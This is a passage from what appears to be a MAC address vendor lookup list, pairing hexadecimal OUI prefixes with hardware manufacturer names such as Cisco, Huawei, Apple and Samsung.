INTERCEPT SERVICES LIMITED D4AD71 Cisco Systems, Inc 702B1D E-Domus International Limited F085C1 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 34DAB7 zte corporation 109C70 Prusa Research s.r.o. 000AA8 ePipe Pty. Ltd. 0029C2 Cisco Systems, Inc 187C0B Ruckus Wireless D47B35 NEO Monitors AS 000878 Benchmark Storage Innovations 103D0A Hui Zhou Gaoshengda Technology Co.,LTD 942790 TCT mobile ltd A41791 Shenzhen Decnta Technology Co.,LTD. 7C604A Avelon 6CF37F Aruba, a Hewlett Packard Enterprise Company 186472 Aruba, a Hewlett Packard Enterprise Company 84D47E Aruba, a Hewlett Packard Enterprise Company 24DEC6 Aruba, a Hewlett Packard Enterprise Company A41908 Fiberhome Telecommunication Technologies Co.,LTD 0014A5 Gemtek Technology Co., Ltd. C0B5D7 CHONGQING FUGUI ELECTRONICS CO.,LTD. 108EBA Molekule 80D336 CERN 64255E Observint Technologies, Inc. 90940A Analog Devices, Inc 40B076 ASUSTek COMPUTER INC. D43D39 Dialog Semiconductor 4C218C Panasonic India Private limited 48F07B ALPSALPINE CO,.LTD 84EB3E Vivint Smart Home CC70ED Cisco Systems, Inc 4CDD7D LHP Telematics LLC B8BC5B Samsung Electronics Co.,Ltd 60380E ALPSALPINE CO,.LTD FC62B9 ALPSALPINE CO,.LTD 0002C7 ALPSALPINE CO,.LTD 001E3D ALPSALPINE CO,.LTD 28A183 ALPSALPINE CO,.LTD 907E30 LARS 18BB26 FN-LINK TECHNOLOGY LIMITED 9C8275 Yichip Microelectronics (Hangzhou) Co.,Ltd 5CCBCA FUJIAN STAR-NET COMMUNICATION CO.,LTD 28E98E Mitsubishi Electric Corporation 948FCF ARRIS Group, Inc. A8F5DD ARRIS Group, Inc. 743A65 NEC Corporation 00255C NEC Corporation 2C4E7D Chunghua Intelligent Network Equipment Inc. A4F465 ITEL MOBILE LIMITED 94A40C Diehl Metering GmbH 70B317 Cisco Systems, Inc B00247 AMPAK Technology, Inc. BCE796 Wireless CCTV Ltd 18B905 Hong Kong Bouffalo Lab Limited ECF0FE zte corporation 44D3AD Shenzhen TINNO Mobile Technology Corp. 34F8E7 Cisco Systems, Inc 4C917A IEEE Registration Authority F48CEB D-Link International B8C74A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D8CE3A Xiaomi Communications Co Ltd B0907E Cisco Systems, Inc 2C7360 Earda Technologies co Ltd E4CA12 zte corporation D49E05 zte corporation 585FF6 zte corporation 40B30E Integrated Device Technology (Malaysia) Sdn. Bhd. 04CE7E NXP France Semiconductors France 7485C4 New H3C Technologies Co., Ltd D0BAE4 Shanghai MXCHIP Information Technology Co., Ltd. 94F6D6 Apple, Inc. F82D7C Apple, Inc. C09AD0 Apple, Inc. 94B01F Apple, Inc. 98CC4D Shenzhen mantunsci co., LTD 102C6B AMPAK Technology, Inc. 508CF5 China Mobile Group Device Co.,Ltd. 1C549E Universal Electronics, Inc. C82E47 Suzhou SmartChip Semiconductor Co., LTD C02250 Koss Corporation 043385 Nanchang BlackShark Co.,Ltd. 6C5C3D IEEE Registration Authority 84E5D8 Guangdong UNIPOE IoT Technology Co.,Ltd. A8BC9C Cloud Light Technology Limited 90C54A vivo Mobile Communication Co., Ltd. BC7596 Beijing Broadwit Technology Co., Ltd. A89042 Beijing Wanwei Intelligent Technology Co., Ltd. 18BE92 Delta Networks, Inc. A0B549 Arcadyan Corporation 001F5A Beckwith Electric Co. 985D82 Arista Networks 90633B Samsung Electronics Co.,Ltd FCAAB6 Samsung Electronics Co.,Ltd 782327 Samsung Electronics Co.,Ltd DCF756 Samsung Electronics Co.,Ltd 2CA02F Veroguard Systems Pty Ltd 1C34DA Mellanox Technologies, Inc. C0132B Sichuan Changhong Electric Ltd. 0CB4A4 Xintai Automobile Intelligent Network Technology D092FA Fiberhome Telecommunication Technologies Co.,LTD E85AD1 Fiberhome Telecommunication Technologies Co.,LTD 2453BF Enernet 1C599B HUAWEI TECHNOLOGIES CO.,LTD 806933 HUAWEI TECHNOLOGIES CO.,LTD BC26C7 Cisco Systems, Inc BC5EA1 PsiKick, Inc. D4BD1E 5VT Technologies,Taiwan LTd. CCD4A1 MitraStar Technology Corp. 3C6A2C IEEE Registration Authority 30E3D6 Spotify USA Inc. 9CA525 Shandong USR IOT Technology Limited 34DAC1 SAE Technologies Development(Dongguan) Co., Ltd. 705DCC EFM Networks A823FE LG Electronics E05D5C Oy Everon Ab 08BA5F Qingdao Hisense Electronics Co.,Ltd. 10DFFC Siemens AG 847F3D Integrated Device Technology (Malaysia) Sdn. Bhd. 944F4C Sound United LLC 981888 Cisco Meraki 48A6B8 Sonos, Inc. B87826 Nintendo Co.,Ltd DCCBA8 Explora Technologies Inc C07878 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. 5076AF Intel Corporate E046E5 Gosuncn Technology Group Co., Ltd. 68A47D Sun Cupid Technology (HK) LTD 184B0D Ruckus Wireless D41243 AMPAK Technology, Inc. 688F2E Hitron Technologies. Inc 18810E Apple, Inc. 608C4A Apple, Inc. 241B7A Apple, Inc. 8CFE57 Apple, Inc. C0A600 Apple, Inc. 74B587 Apple, Inc. FCB6D8 Apple, Inc. E81CBA Fortinet, Inc. E0C286 Aisai Communication Technology Co., Ltd. D80D17 TP-LINK TECHNOLOGIES CO.,LTD. 7405A5 TP-LINK TECHNOLOGIES CO.,LTD. 286DCD Beijing Winner Microelectronics Co.,Ltd. 541031 SMARTO 44A466 GROUPE LDLC E0456D China Mobile Group Device Co.,Ltd. 283926 CyberTAN Technology Inc. C4FDE6 DRTECH CC988B SONY Visual Products Inc. 1889A0 Wuhan Funshion Online Technologies Co.,Ltd 0C2A86 Fiberhome Telecommunication Technologies Co.,LTD FC61E9 Fiberhome Telecommunication Technologies Co.,LTD 8CFCA0 Shenzhen Smart Device Technology Co., LTD. 1C427D GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 18C2BF BUFFALO.INC F0B014 AVM Audiovisuelles Marketing und Computersysteme GmbH DC3979 Cisco Systems, Inc 58D56E D-Link International 18937F AMPAK Technology, Inc. A43523 Guangdong Donyan Network Technologies Co.,Ltd. B4A94F MERCURY CORPORATION 803AF4 Fiberhome Telecommunication Technologies Co.,LTD 405662 GuoTengShengHua Electronics LTD. E4DB6D Beijing Xiaomi Electronics Co., Ltd. 0C5331 ETH Zurich F85E3C SHENZHEN ZHIBOTONG ELECTRONICS CO.,LTD DC9088 HUAWEI TECHNOLOGIES CO.,LTD 54812D PAX Computer Technology(Shenzhen) Ltd. 0C9A42 FN-LINK TECHNOLOGY LIMITED 001827 NEC UNIFIED SOLUTIONS NEDERLAND B.V. 283E76 Common Networks 00D0D8 3COM 00A0D1 INVENTEC CORPORATION 0018CC AXIOHM SAS 009004 3COM EUROPE LTD 00068C 3COM 02608C 3COM 3C71BF Espressif Inc. 902BD2 HUAWEI TECHNOLOGIES CO.,LTD 08D59D Sagemcom Broadband SAS 48A0F8 Fiberhome Telecommunication Technologies Co.,LTD 4062EA China Mobile Group Device Co.,Ltd. 0026B7 Kingston Technology Company, Inc. 000809 Systemonic AG 8C41F4 IPmotion GmbH 704F08 Shenzhen Huisheng Information Technology Co., Ltd. 80A796 Neuralink Corp. 44657F Calix Inc. 304B07 Motorola Mobility LLC, a Lenovo Company 345ABA tcloud intelligence B46921 Intel Corporate 000393 Apple, Inc. 0000C3 Harris Corporation 502FA8 Cisco Systems, Inc C08359 IEEE Registration Authority CC2119 Samsung Electronics Co.,Ltd 302303 Belkin International Inc. 8835C1 OI ELECTRIC CO.,LTD 3042A1 ilumisys Inc. DBA Toggled 9CF6DD IEEE Registration Authority 001E80 Icotera A/S 48881E EthoSwitch LLC 4C0FC7 Earda Technologies co Ltd 0004AE Sullair Corporation FCB10D Shenzhen Tian Kun Technology Co.,LTD. 20F77C vivo Mobile Communication Co., Ltd. 00451D Cisco Systems, Inc A0D635 WBS Technology 3C427E IEEE Registration Authority D8912A Zyxel Communications Corporation 000C8A Bose Corporation 30D659 Merging Technologies SA 702AD5 Samsung Electronics Co.,Ltd 001EEC COMPAL INFORMATION (KUNSHAN) CO., LTD. F0761C COMPAL INFORMATION (KUNSHAN) CO., LTD. 14942F USYS CO.,LTD. 000BA3 Siemens AG 34800D Cavium Inc B44BD6 IEEE Registration Authority 889765 exands EC83D5 GIRD Systems Inc 641C67 DIGIBRAS INDUSTRIA DO BRASILS/A 60058A Hitachi Metals, Ltd. BC22FB RF Industries 386E88 zte corporation A019B2 IEEE Registration Authority 58A48E PixArt Imaging Inc. 243A82 IRTS 880907 MKT Systemtechnik GmbH & Co. KG 8C15C7 HUAWEI TECHNOLOGIES CO.,LTD 60FA9D HUAWEI TECHNOLOGIES CO.,LTD DC9914 HUAWEI TECHNOLOGIES CO.,LTD 40EEDD HUAWEI TECHNOLOGIES CO.,LTD AC751D HUAWEI TECHNOLOGIES CO.,LTD 289E97 HUAWEI TECHNOLOGIES CO.,LTD 4C3FD3 Texas Instruments 001EB0 ImesD Electronica S.L. 001525 Chamberlain Access Solutions B05365 China Mobile IOT Company Limited 308841 Sichuan AI-Link Technology Co., Ltd. 44EFCF UGENE SOLUTION inc. 00B8C2 Heights Telecom T ltd B4B686 Hewlett Packard 4CEDFB ASUSTek COMPUTER INC. D0B214 PoeWit Inc 0080B6 Mercury Systems – Trusted Mission Solutions, Inc. 08512E Orion Diagnostica Oy 98A404 Ericsson AB 00CC3F Universal Electronics, Inc. 74EB80 Samsung Electronics Co.,Ltd 0CE0DC Samsung Electronics Co.,Ltd D868C3 Samsung Electronics Co.,Ltd C493D9 Samsung Electronics Co.,Ltd A82BB9 Samsung Electronics Co.,Ltd ACFD93 WEIFANG GOERTEK ELECTRONICS CO.,LTD 000E8F Sercomm Corporation. 74B91E Nanjing Bestway Automation System Co., Ltd F4BF80 HUAWEI TECHNOLOGIES CO.,LTD 304596 HUAWEI TECHNOLOGIES CO.,LTD C0F4E6 HUAWEI TECHNOLOGIES CO.,LTD 68572D Tuya Smart Inc. E46059 Pingtek Co., Ltd. 4050B5 Shenzhen New Species Technology Co., Ltd. 1C1AC0 Apple, Inc. 3078C2 Innowireless / QUCELL Networks E0191D HUAWEI TECHNOLOGIES CO.,LTD 68D1BA Shenzhen YOUHUA Technology Co., Ltd 88D652 AMERGINT Technologies FC90FA Independent Technologies E4E130 TCT mobile ltd 7001B5 Cisco Systems, Inc 001F49 Manhattan TV Ltd 0C2138 Hengstler GmbH 6CAF15 Webasto SE A0E617 MATIS 40F04E Integrated Device Technology (Malaysia) Sdn. Bhd. 00CFC0 China Mobile Group Device Co.,Ltd. 7C2EBD Google, Inc. 0011E6 Scientific Atlanta AC35EE FN-LINK TECHNOLOGY LIMITED D4C19E Ruckus Wireless 800588 Ruijie Networks Co.,LTD F00E1D Megafone Limited E0383F zte corporation D47226 zte corporation 0021F2 EASY3CALL Technology Limited 0015C4 FLOVEL CO., LTD. 5C1DD9 Apple, Inc. 68FEF7 Apple, Inc. 24F128 Telstra 3C15FB HUAWEI TECHNOLOGIES CO.,LTD DC330D QING DAO HAIER TELECOM CO.,LTD. 0C2C54 HUAWEI TECHNOLOGIES CO.,LTD 881196 HUAWEI TECHNOLOGIES CO.,LTD E40EEE HUAWEI TECHNOLOGIES CO.,LTD 88AE07 Apple, Inc. 40831D Apple, Inc. DCD3A2 Apple, Inc. 28D997 Yuduan Mobile Co., Ltd. 0CAE7D Texas Instruments 304511 Texas Instruments 70695A Cisco Systems, Inc 00BF77 Cisco Systems, Inc D07714 Motorola Mobility LLC, a Lenovo Company 30B7D4 Hitron Technologies. Inc B481BF Meta-Networks, LLC 000758 DragonWave Inc. 946AB0 Arcadyan Corporation 4818FA Nocsys 587A6A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD E81AAC ORFEO SOUNDWORKS Inc. A038F8 OURA Health Oy 687924 ELS-GmbH & Co. KG D49398 Nokia Corporation 001937 CommerceGuard AB FC7C02 Phicomm (Shanghai) Co., Ltd. 047970 HUAWEI TECHNOLOGIES CO.,LTD A057E3 HUAWEI TECHNOLOGIES CO.,LTD B02680 Cisco Systems, Inc F0FCC8 ARRIS Group, Inc. 301F9A IEEE Registration Authority 28FD80 IEEE Registration Authority 609813 Shanghai Visking Digital Technology Co. LTD F8DF15 Sunitec Enterprise Co.,Ltd 38DEAD Intel Corporate D46D6D Intel Corporate B41C30 zte corporation 705AAC Samsung Electronics Co.,Ltd A8610A ARDUINO AG 6097DD MicroSys Electronics GmbH 506B4B Mellanox Technologies, Inc. 1CB044 ASKEY COMPUTER CORP AC17C8 Cisco Meraki 2C9569 ARRIS Group, Inc. F4844C Texas Instruments 4C82CF Dish Technologies Corp 285767 Dish Technologies Corp 70169F EtherCAT Technology Group 8C1645 LCFC(HeFei) Electronics Technology co., ltd 689861 Beacon Inc B4F2E8 ARRIS Group, Inc. 3C574F China Mobile Group Device Co.,Ltd. 1CA0B8 Hon Hai Precision Industry Co., Ltd. A039EE Sagemcom Broadband SAS E4CB59 Beijing Loveair Science and Technology Co. Ltd. B4E62D Espressif Inc. F0766F Apple, Inc. 847460 zte corporation 4098AD Apple, Inc. 6C4D73 Apple, Inc. 68EF43 Apple, Inc. D02B20 Apple, Inc. 2C61F6 Apple, Inc. D4A33D Apple, Inc. E43022 Hanwha Techwin Security Vietnam 044F17 HUMAX Co., Ltd. 685ACF Samsung Electronics Co.,Ltd 0CA8A7 Samsung Electronics Co.,Ltd B0672F Bowers & Wilkins 10CD6E FISYS D89C67 Hon Hai Precision Ind. Co.,Ltd. D86375 Xiaomi Communications Co Ltd 0090F1 Seagate Cloud Systems Inc 845A81 ffly4u CC81DA Phicomm (Shanghai) Co., Ltd. 00806C Secure Systems & Services 80C5F2 AzureWave Technology Inc. 64F88A China Mobile IOT Company Limited 48555C Wu Qi Technologies,Inc. 702605 SONY Visual Products Inc. D88466 Extreme Networks, Inc. 000496 Extreme Networks, Inc. 00E02B Extreme Networks, Inc. 5C0E8B Extreme Networks, Inc. 7467F7 Extreme Networks, Inc. 007263 Netcore Technology Inc. 1C27DD Datang Gohighsec(zhejiang)Information Technology Co.,Ltd. 64209F Tilgin AB A43E51 ANOV FRANCE E48F34 Vodafone Italia S.p.A. B8C8EB ITEL MOBILE LIMITED B45253 Seagate Technology 0011C6 Seagate Technology 001D38 Seagate Technology 005013 Seagate Cloud Systems Inc 240D6C SMND 68DB54 Phicomm (Shanghai) Co., Ltd. C8DF84 Texas Instruments EC1D8B Cisco Systems, Inc EC7097 ARRIS Group, Inc. 5819F8 ARRIS Group, Inc. 3873EA IEEE Registration Authority 4C5262 Fujitsu Technology Solutions GmbH 803BF6 LOOK EASY INTERNATIONAL LIMITED 18F0E4 Xiaomi Communications Co Ltd 9C8C6E Samsung Electronics Co.,Ltd DC4F22 Espressif Inc. F86CE1 Taicang T&W Electronics 1C7328 Connected Home D8E004 Vodia Networks Inc 2CFDAB Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 30B4B8 LG Electronics 380E4D Cisco Systems, Inc 08BA22 Swaive Corporation 28C13C Hon Hai Precision Industry Co., Ltd. C4CD82 Hangzhou Lowan Information Technology Co., Ltd. 30FB94 Shanghai Fangzhiwei Information Technology CO.,Ltd. 30EB1F Skylab M&C Technology Co.,Ltd 549A4C GUANGDONG HOMECARE TECHNOLOGY CO.,LTD. 0CCEF6 Guizhou Fortuneship Technology Co., Ltd 1806FF Acer Computer(Shanghai) Limited. 0023A0 Hana CNS Co., LTD. F406A5 Hangzhou Bianfeng Networking Technology Co., Ltd. A4B52E Integrated Device Technology (Malaysia) Sdn. Bhd. D07FC4 Ou Wei Technology Co.,Ltd. of Shenzhen City 1479F3 China Mobile Group Device Co.,Ltd. B0ECE1 Private 60E78A UNISEM 64CBA3 Pointmobile 002424 Ace Axis Limited 50C9A0 SKIPPER AS 7483EF Arista Networks 00E0F6 DECISION EUROPE DC5583 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F8F21E Intel Corporate 282986 APC by Schneider Electric 707DB9 Cisco Systems, Inc 08BEAC Edimax Technology Co. Ltd. 8C0F83 Angie Hospitality LLC D00401 Motorola Mobility LLC, a Lenovo Company 742857 Mayfield Robotics 589043 Sagemcom Broadband SAS 1046B4 FormericaOE 9CE33F Apple, Inc. ECFABC Espressif Inc. CC2DE0 Routerboard.com 00BF61 Samsung Electronics Co.,Ltd 24E124 Xiamen Milesight IoT Co., Ltd. DC68EB Nintendo Co.,Ltd E8361D Sense Labs, Inc. 3CA581 vivo Mobile Communication Co., Ltd. 34E911 vivo Mobile Communication Co., Ltd. 001248 Dell EMC 006048 Dell EMC 7CC95A Dell EMC 7867D7 Apple, Inc. B8C111 Apple, Inc. 080069 Silicon Graphics 002291 Cisco Systems, Inc 10FCB6 mirusystems CO.,LTD 04D6AA SAMSUNG ELECTRO-MECHANICS(THAILAND) 0C5842 DME Micro B810D4 Masimo Corporation BC825D MITSUMI ELECTRIC CO.,LTD. 389D92 Seiko Epson Corporation A07099 Beijing Huacan Electronics Co., Ltd 48D6D5 Google, Inc. 20F19E ARRIS Group, Inc. C89F42 VDII Innovation AB 50A83A S Mobile Devices Limited 6405E9 Shenzhen WayOS Technology Crop., Ltd. F4F5DB Xiaomi Communications Co Ltd CC2237 IEEE Registration Authority 7091F3 Universal Electronics, Inc. BC3D85 HUAWEI TECHNOLOGIES CO.,LTD 2054FA HUAWEI TECHNOLOGIES CO.,LTD 38378B HUAWEI TECHNOLOGIES CO.,LTD 745C4B GN Audio A/S 087808 Samsung Electronics Co.,Ltd 887598 Samsung Electronics Co.,Ltd C0174D Samsung Electronics Co.,Ltd A407B6 Samsung Electronics Co.,Ltd 40498A Synapticon GmbH D0666D Shenzhen Bus-Lan Technology Co., Ltd. 08152F Samsung Electronics Co., Ltd. ARTIK 00149D Sound ID Inc. A8E824 INIM ELECTRONICS S.R.L. 38D620 Limidea Concept Pte. Ltd. 104963 HARTING K.K. 8CD48E ITEL MOBILE LIMITED 642B8A ALL BEST Industrial Co., Ltd. 8CE38E Kioxia Corporation 186024 Hewlett Packard 000659 EAL (Apeldoorn) B.V. 74F91A Onface A434F1 Texas Instruments 78A6E1 Brocade Communications Systems LLC E4EC10 Nokia Corporation ECD09F Xiaomi Communications Co Ltd 78E103 Amazon Technologies Inc. 002692 Mitsubishi Electric Corporation 444E6D AVM Audiovisuelles Marketing und Computersysteme GmbH 90B1E0 Beijing Nebula Link Technology Co., Ltd 6C090A GEMATICA SRL 70E1FD FLEXTRONICS 74E60F TECNO MOBILE LIMITED 001AA7 Torian Wireless 00C08F Panasonic Electric Works Co., Ltd. 8CC121 Panasonic Corporation AVC Networks Company A8BE27 Apple, Inc. EC0441 ShenZhen TIGO Semiconductor Co., Ltd. 8014A8 Guangzhou V-SOLUTION Electronic Technology Co., Ltd. 586163 Quantum Networks (SG) Pte. Ltd. 002EC7 HUAWEI TECHNOLOGIES CO.,LTD 488EEF HUAWEI TECHNOLOGIES CO.,LTD B0350B MOBIWIRE MOBILES (NINGBO) CO.,LTD 28A6AC seca gmbh & co. kg ACBE75 Ufine Technologies Co.,Ltd. B8EE0E Sagemcom Broadband SAS C0A53E Apple, Inc. 409BCD D-Link International 0CB459 Marketech International Corp. 94D029 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 308454 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 0840F3 Tenda Technology Co.,Ltd.Dongguan branch 94FBB2 SHENZHEN GONGJIN ELECTRONICS CO.,LT 5C0339 HUAWEI TECHNOLOGIES CO.,LTD EC3DFD SHENZHEN BILIAN ELECTRONIC CO.,LTD 547595 TP-LINK TECHNOLOGIES CO.,LTD. C47154 TP-LINK TECHNOLOGIES CO.,LTD. F82819 Liteon Technology Corporation 50E971 Jibo, Inc. FC5A1D Hitron Technologies. Inc 94147A vivo Mobile Communication Co., Ltd. 00C05D L&N TECHNOLOGIES 30F77F S Mobile Devices Limited D86C63 Google, Inc. 58C583 ITEL MOBILE LIMITED 18204C Kummler+Matter AG 18D225 Fiberhome Telecommunication Technologies Co.,LTD F88A3C IEEE Registration Authority A40450 nFore Technology Inc. 001E99 Vantanol Industrial Corporation 58B633 Ruckus Wireless 543D37 Ruckus Wireless 5C5181 Samsung Electronics Co.,Ltd 608E08 Samsung Electronics Co.,Ltd 2CE6CC Ruckus Wireless 00227F Ruckus Wireless 74911A Ruckus Wireless 681DEF Shenzhen CYX Technology Co., Ltd. B40016 INGENICO TERMINALS SAS AC203E Wuhan Tianyu Information Industry Co., Ltd. B01F29 Helvetia INC. AC4E2E Shenzhen JingHanDa Electronics Co.Ltd 880F10 Huami Information Technology Co.,Ltd. 14612F Avaya Inc 00309D Nimble Microsystems, Inc. 8C210A TP-LINK TECHNOLOGIES CO.,LTD. 4C189A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD CC4B73 AMPAK Technology, Inc. 0015DC KT&C Co., Ltd. 00187D Armorlink Co .Ltd 4C910C Lanix Internacional, S.A. de C.V. 54C9DF FN-LINK TECHNOLOGY LIMITED 18B430 Nest Labs Inc. 30B164 Power Electronics International Inc. 9828A6 COMPAL INFORMATION (KUNSHAN) CO., LTD. C8DB26 Logitech A40E2B Facebook Inc 001B17 Palo Alto Networks 58493B Palo Alto Networks 786D94 Palo Alto Networks 943FC2 Hewlett Packard Enterprise F430B9 Hewlett Packard A47886 Avaya Inc 0403D6 Nintendo Co.,Ltd 206BE7 TP-LINK TECHNOLOGIES CO.,LTD. 182CB4 Nectarsoft Co., Ltd. 74F61C HTC Corporation 2C3AE8 Espressif Inc. 88BD78 Flaircomm Microelectronics,Inc. 58C5CB Samsung Electronics Co.,Ltd 982DBA Fibergate Inc. 5C1A6F Cambridge Industries(Group) Co.,Ltd. 3C4CD0 CERAGON NETWORKS F40E83 ARRIS Group, Inc. 98F7D7 ARRIS Group, Inc. B8FFB3 MitraStar Technology Corp. B4BFF6 Samsung Electronics Co.,Ltd 84C0EF Samsung Electronics Co.,Ltd 00A38E Cisco Systems, Inc A0C9A0 Murata Manufacturing Co., Ltd. E0D55E GIGA-BYTE TECHNOLOGY CO.,LTD. A040A0 NETGEAR 004066 APRESIA Systems Ltd 48A74E zte corporation BC8AE8 QING DAO HAIER TELECOM CO.,LTD. F4DE0C ESPOD Ltd. 3C5282 Hewlett Packard 08ED02 IEEE Registration Authority E8FDE8 CeLa Link Corporation C40BCB Xiaomi Communications Co Ltd 28C63F Intel Corporate 88CC45 Skyworth Digital Technology(Shenzhen) Co.,Ltd CC90E8 Shenzhen YOUHUA Technology Co., Ltd EC363F Markov Corporation 5804CB Tianjin Huisun Technology Co.,Ltd. 60D7E3 IEEE Registration Authority A0086F HUAWEI TECHNOLOGIES CO.,LTD D06F82 HUAWEI TECHNOLOGIES CO.,LTD A0F479 HUAWEI TECHNOLOGIES CO.,LTD 844765 HUAWEI TECHNOLOGIES CO.,LTD C4FF1F HUAWEI TECHNOLOGIES CO.,LTD A0C4A5 SYGN HOUSE INC. 1893D7 Texas Instruments A8B86E LG Electronics (Mobile Communications) 600837 ivvi Scientific(Nanchang)Co.Ltd B83765 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 345BBB GD Midea Air-Conditioning Equipment Co.,Ltd. 34CE00 XIAOMI Electronics,CO.,LTD 84AFEC BUFFALO.INC 7C7B8B Control Concepts, Inc. 84A9C4 HUAWEI TECHNOLOGIES CO.,LTD 7C4F7D Sawwave 9CAC6D Universal Electronics, Inc. 000D2B Racal Instruments 002CC8 Cisco Systems, Inc C0028D WINSTAR Display CO.,Ltd E89FEC CHENGDU KT ELECTRONIC HI-TECH CO.,LTD 802689 D-Link International F8AB05 Sagemcom Broadband SAS E0C0D1 CK Telecom (Shenzhen) Limited C0D3C0 Samsung Electronics Co.,Ltd 948BC1 Samsung Electronics Co.,Ltd 14568E Samsung Electronics Co.,Ltd 6837E9 Amazon Technologies Inc. 2CA17D ARRIS Group, Inc. D83214 Tenda Technology Co.,Ltd.Dongguan branch 10954B Megabyte Ltd. C4B9CD Cisco Systems, Inc EC4F82 Calix Inc. 98DDEA Infinix mobility limited 001D44 Krohne A8A198 TCT mobile ltd 00219E Sony Corporation ACB57D Liteon Technology Corporation D4619D Apple, Inc. 14BD61 Apple, Inc. 00D095 Alcatel-Lucent Enterprise 0020DA Alcatel-Lucent Enterprise 6C5976 Shanghai Tricheer Technology Co.,Ltd. 5CC6E9 Edifier International 08EA40 SHENZHEN BILIAN ELECTRONIC CO.,LTD D0498B ZOOM SERVER 0827CE NAGANO KEIKI CO., LTD. 503A7D AlphaTech PLC Int’l Co., Ltd. F4C4D6 Shenzhen Xinfa Electronic Co.,ltd 7C5049 Apple, Inc. E47DEB Shanghai Notion Information Technology CO.,LTD. F8A5C5 Cisco Systems, Inc 7C5A1C Sophos Ltd B0F1EC AMPAK Technology, Inc. 542B57 Night Owl SP D461FE Hangzhou H3C Technologies Co., Limited 501E2D StreamUnlimited Engineering GmbH E45D51 SFR F87588 HUAWEI TECHNOLOGIES CO.,LTD F44C7F HUAWEI TECHNOLOGIES CO.,LTD A0A33B HUAWEI TECHNOLOGIES CO.,LTD EC01EE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 6049C1 Avaya Inc 702084 Hon Hai Precision Industry Co., Ltd. D8325A Shenzhen YOUHUA Technology Co., Ltd 9CDA3E Intel Corporate 283F69 Sony Corporation 001081 DPS, INC. 40F385 IEEE Registration Authority 887873 Intel Corporate 9C6650 Glodio Technolies Co.,Ltd Tianjin Branch 7C67A2 Intel Corporate 64B473 Xiaomi Communications Co Ltd 7451BA Xiaomi Communications Co Ltd 6CB4A7 Landauer, Inc. 48A380 Gionee Communication Equipment Co.,Ltd. 94652D OnePlus Technology (Shenzhen) Co., Ltd 0060D3 AT&T 848DC7 Cisco SPVTG 045D4B Sony Corporation 78AF58 GIMASI SA 1CB857 Becon Technologies Co,.Ltd. 682737 Samsung Electronics Co.,Ltd 080027 PCS Systemtechnik GmbH 2C4D54 ASUSTek COMPUTER INC. 349672 TP-LINK TECHNOLOGIES CO.,LTD. 00E05A GALEA NETWORK SECURITY F06E32 MICROTEL INNOVATION S.R.L. 7802F8 Xiaomi Communications Co Ltd 00238A Ciena Corporation 3CF862 Intel Corporate 3478D7 Gionee Communication Equipment Co.,Ltd. 5CCCA0 Gridwiz Inc. 2C0BE9 Cisco Systems, Inc 90505A unGlue, Inc 8C9351 Jigowatts Inc. C43018 MCS Logic Inc. 6831FE Teladin Co.,Ltd. BC9FEF Apple, Inc. 20AB37 Apple, Inc. 60F445 Apple, Inc. E0A700 Verkada Inc D838FC Ruckus Wireless 58404E Apple, Inc. D0C5F3 Apple, Inc. 001992 Adtran Inc 2816AD Intel Corporate D0FF98 HUAWEI TECHNOLOGIES CO.,LTD B0E5ED HUAWEI TECHNOLOGIES CO.,LTD C486E9 HUAWEI TECHNOLOGIES CO.,LTD 000AE4 Wistron Corporation 5800E3 Liteon Technology Corporation A0E0AF Cisco Systems, Inc 48F97C Fiberhome Telecommunication Technologies Co.,LTD 40B93C Hewlett Packard Enterprise C0BFC0 HUAWEI TECHNOLOGIES CO.,LTD 344B3D Fiberhome Telecommunication Technologies Co.,LTD A408F5 Sagemcom Broadband SAS 00B091 Transmeta Corp. ACC662 MitraStar Technology Corp. 003048 Super Micro Computer, Inc. FC3CE9 Tsingtong Technologies Co, Ltd. 7CF95C U.I. Lapp GmbH 101331 Technicolor Delivery Technologies Belgium NV 4CB81C SAM Electronics GmbH A4580F IEEE Registration Authority C8F733 Intel Corporate A03D6F Cisco Systems, Inc 886B44 Sunnovo International Limited A08CF8 HUAWEI TECHNOLOGIES CO.,LTD 44D244 Seiko Epson Corporation 0023F7 Private A4E6B1 Shanghai Joindata Technology Co.,Ltd. C09C04 Shaanxi GuoLian Digital TV Technology Co.,Ltd. ACD657 Shaanxi GuoLian Digital TV Technology Co.,Ltd. B49691 Intel Corporate 007686 Cisco Systems, Inc 8C2FA6 Solid Optics B.V. 8C192D IEEE Registration Authority 00ACE0 ARRIS Group, Inc. 007532 INID BV 6473E2 Arbiter Systems, Inc. E45D52 Avaya Inc 88C626 Logitech, Inc D0608C zte corporation 7C03C9 Shenzhen YOUHUA Technology Co., Ltd 14A51A HUAWEI TECHNOLOGIES CO.,LTD 047503 HUAWEI TECHNOLOGIES CO.,LTD D4C8B0 Prime Electronics & Satellitics Inc. B8E937 Sonos, Inc. AC233F Shenzhen Minew Technologies Co., Ltd. 0481AE Clack Corporation 9C13AB Chanson Water Co., Ltd. 703D15 Hangzhou H3C Technologies Co., Limited E49E12 FREEBOX SAS 9CD9CB Lesira Manufacturing Pty Ltd 94E979 Liteon Technology Corporation 3CEF8C Zhejiang Dahua Technology Co., Ltd. 3C80AA Ransnet Singapore Pte Ltd A4D9A4 neXus ID Solutions AB E02CF3 MRS Electronic GmbH 50B363 Digitron da Amazonia S/A D4E90B CVT CO.,LTD CCB0DA Liteon Technology Corporation 58E16C Ying Hua Information Technology (Shanghai)Co., LTD C82158 Intel Corporate 2420C7 Sagemcom Broadband SAS 446AB7 ARRIS Group, Inc. 701CE7 Intel Corporate 9C2A70 Hon Hai Precision Ind. Co.,Ltd. 98E476 Zentan 18F292 Shannon Systems 8CEA1B Edgecore Networks Corporation 2C0E3D SAMSUNG ELECTRO-MECHANICS(THAILAND) 00D78F Cisco Systems, Inc 4409B8 Salcomp (Shenzhen) CO., LTD. 04BA36 Li Seng Technology Ltd 107223 TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO A4C64F HUAWEI TECHNOLOGIES CO.,LTD CCFD17 TCT 